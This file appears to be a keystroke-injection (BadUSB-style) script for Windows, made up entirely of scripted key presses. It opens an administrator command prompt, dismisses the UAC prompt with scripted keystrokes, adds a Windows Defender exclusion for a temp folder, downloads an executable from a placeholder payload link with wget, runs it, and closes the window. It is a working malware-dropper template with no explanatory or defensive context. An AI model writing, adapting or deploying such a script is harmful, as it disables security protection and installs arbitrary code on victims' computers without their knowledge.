layout('us');
press("GUI R");
delay(500);
type("powershell Start-Process cmd -Verb RunAs");
delay(2500);
press("ENTER");
delay(3000);
press("TAB");
delay(200);
press("TAB");
delay(200);
press("ENTER");
delay(800);
type("powershell");
delay(100);
press("ENTER");
delay(500);
type("mkdir 'C:\Windows\Temp\tmp'");
delay(2000);
press("ENTER");
delay(600);
type("powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\Temp\tmp'");
delay(2000);
press("ENTER");
delay(2000);
type("wget (payload link) -o  C:\Windows\Temp\tmp\tmp.exe");
delay(800);
press("ENTER");
delay(2000);
type("Start-Process -FilePath 'C:\Windows\Temp\tmp\tmp.exe'");
delay(700);
press("ENTER");
delay(500);
press("ALT F4");